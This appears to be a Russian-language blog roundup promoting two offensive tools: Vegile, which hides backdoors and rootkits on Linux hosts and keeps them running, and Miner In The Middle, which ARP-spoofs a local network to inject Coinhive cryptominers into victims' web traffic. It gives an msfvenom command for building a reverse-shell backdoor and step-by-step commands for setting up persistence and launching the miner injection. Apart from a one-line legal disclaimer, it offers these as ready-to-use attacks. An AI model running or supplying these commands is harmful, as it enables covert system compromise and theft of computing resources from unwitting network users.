Vegile – Призрак в шелле

Vegile – это инструмент для работы в Postfix.

Технология Post Exploitation гарантирует, что мы поддержим некоторый уровень доступа и потенциально может привести к более глубоким позициям в нашей целевой сети.

Этот инструмент будет настраивать ваш backdoor / rootkits, b  когда бэкдор уже настроит его, будет скрыт ваш процесс sposeifc, неограниченный  и прозрачный сеанс в metasploit.

Даже когда он будет убит, он снова запустится.

Вы можете использовать thefatrat для помощи в создании простого бэкдора:

 # msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "x00" -f elf -o NAME_BACKDOOR 

Для скрытого процесса,вы можете использовать руткиты, бэкдоры, и ботнет {sh, python, perl, exe и binary}.

Целевые жертвы для всех дистрибутивов Linux включают (base32 и base64 в их системе)

Для получения атозапуска вы можете использовать crontab и xinit.d в своем бэкдоре.

Как начать

 #  git clone https://github.com/Screetsec/Vegile.git

# cd Vegile

# chmod +x Vegile 

Использование Vegile

Запуск Vegile без каких-либо параметров даст полезный список наиболее распространенных опций. вы можете использовать команду:

 #  Vegile -i / --inject [backdoor/rootkit]

# Vegile -u / --unlimited [backdoor/rootkit]

# Vegile -h / --help 

Скачать Vegile

Miner In The Middle Автор – Энтони Рассел @DotNetRussell

Не для незаконного использования! (если вы не владеете сетью или не имеете разрешения от всех на ней, это незаконно)

ВСТУПЛЕНИЕ:

Miner in the Middle – это скрипт, который позволяет вам вводить javascript-майнеры всем в вашей локальной сети.

Он делает это путем arp спуфинга сети и ожидания HTTP-трафика.

Как только он ее увидит, он вводит в трафик javascript coinhive и возвращает его клиенту.

Стандартный режим делает это на любой странице, которую просматривает человек.

Режим pop in открывает свою запрошенную страницу на новой вкладке и оставляет майнер на старой вкладке. 

ИСПОЛЬЗОВАТЬ:

Сначала вам нужно убедиться, что у вас есть MitMf, а также Twisted version 15.5.0.

Для установки зависимостей выполните:

 # /miner_itm.sh --install 

—- Чтобы запустить стандартную атаку майнера —-

Стандартная сетевая атака arp обманывает сеть, а затем вводит майнер в ответы HTTP.

Для запуска стандартной атаки на майнер:

 # ./miner_itm.sh <coinhive api key> <gateway ip> <eth0 > 

—- Для запуска всплывающей майнер атаки —-

Атака popup miner попытается вставить скрипт в ответы HTTP.

Скрипт будет ждать, пока пользователь нажмет кнопку.

Когда они это сделают, появится всплывающее окно со своим сайтом, а в исходном окне появится майнер.

Первый запуск:

 # ./miner_itm.sh --generate <coinhive api key> 

и поместите payload.html в корневой каталог вашего веб-сервера

Второй запуск:

 # ./miner_itm.sh -p <gateway ip> <interface name> <web server ip> 

Скачать MinerInTheMiddle